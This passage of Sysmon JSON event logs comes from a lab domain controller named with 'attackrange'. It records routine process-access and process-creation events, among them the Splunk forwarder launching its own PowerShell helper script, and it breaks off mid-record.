{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3712,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.955\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.955","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3713,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.955\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.955","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3714,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.955\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.955","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3715,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.955\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1FF7-5F25-0000-001032A10500}\r\nTargetProcessId: 3672\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.955","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1FF7-5F25-0000-001032A10500}","TargetProcessId":"3672","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3716,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:36.066\r\nProcessGuid: {41C8662E-1FF8-5F25-0000-0010C9A30500}\r\nProcessId: 4284\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\powershell.cmd\" --scheme\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:55:36.066","ProcessGuid":"{41C8662E-1FF8-5F25-0000-0010C9A30500}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\powershell.cmd\" --scheme\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:55:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3717,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:36.064\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 4472\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-1FF8-5F25-0000-0010C9A30500}\r\nTargetProcessId: 4284\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:36.064","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"4472","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-1FF8-5F25-0000-0010C9A30500}","TargetProcessId":"4284","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3718,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:36.064\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FF8-5F25-0000-0010C9A30500}\r\nTargetProcessId: 4284\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:36.064","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FF8-5F25-0000-0010C9A30500}","TargetProcessId":"4284","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:55:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3719,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:36.064\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:36.064","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3720,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:36.064\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 